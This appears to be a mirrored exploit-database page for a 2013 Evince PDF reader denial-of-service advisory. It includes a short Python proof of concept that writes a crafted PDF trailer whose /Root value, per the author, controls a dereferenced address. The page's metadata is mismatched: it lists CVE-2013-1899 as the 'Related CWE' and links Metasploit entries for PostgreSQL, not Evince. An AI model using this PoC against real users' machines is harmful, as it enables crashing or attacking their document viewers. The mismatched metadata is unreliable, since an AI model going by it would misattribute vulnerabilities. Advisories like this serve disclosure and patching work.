header-logo
Suggest Exploit
vendor:
Evince
by:
Deva, Securimag Team
7,5
CVSS
HIGH
Denial Of Service
189
CWE
Product Name: Evince
Affected Version From: Windows 2.32.0.145, Linux 3.4.0
Affected Version To: Windows 2.32.0.145, Linux 3.4.0
Patch Exists: YES
Related CWE: CVE-2013-1899
CPE: o:gnome:evince
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2013-1899/https://www.rapid7.com/db/vulnerabilities/apple-osx-apache-cve-2013-1899/https://www.rapid7.com/db/vulnerabilities/suse-cve-2013-1899/https://www.rapid7.com/db/vulnerabilities/apple-osx-postgresql-cve-2013-1899/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2013-1899/https://www.rapid7.com/db/vulnerabilities/postgres-cve-2013-1899/https://www.rapid7.com/db/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 & 8, Ubuntu 13.04
2013

Evince 2.32.0.145 – Denial Of Service

Evince is vulnerable to a denial of service attack when a specially crafted PDF file is opened. The vulnerability is caused due to an integer overflow error when processing the /Root object in a PDF file. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted PDF file.

Mitigation:

Upgrade to the latest version of Evince.
Source

Exploit-DB raw data:

Advisory Information :
======================
Title : Evince 2.32.0.145 - Denial Of Service
Product : Evince pdf reader
Vendor Homepage: https://projects.gnome.org/evince/
Vulnerable Version(s) : Windows 2.32.0.145, Linux 3.4.0 and probably prior release
Tested Version : Windows 2.32.0.145, Linux 3.4.0
Tested On : Windows 7 & 8, Ubuntu 13.04
Discovered By : Deva, Securimag Team
 
Introduction :
==============
Evince is a document viewer for multiple document formats. 
The goal of evince is to replace the multiple document viewers that exist on the GNOME Desktop with a single simple application.
 
- Copied from : https://projects.gnome.org/evince/

Proof Of Concept :
==================
You can control dereferenced address by changing value of /Root (here 42)

#!/usr/bin/python

pdf = """trailer
<<
/Size 1337
/Root 42 0 R
>>
startxref
1
%%EOF
"""
 
filename = "EvincePoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()

Navigation

Suggest Exploit

Services By CQR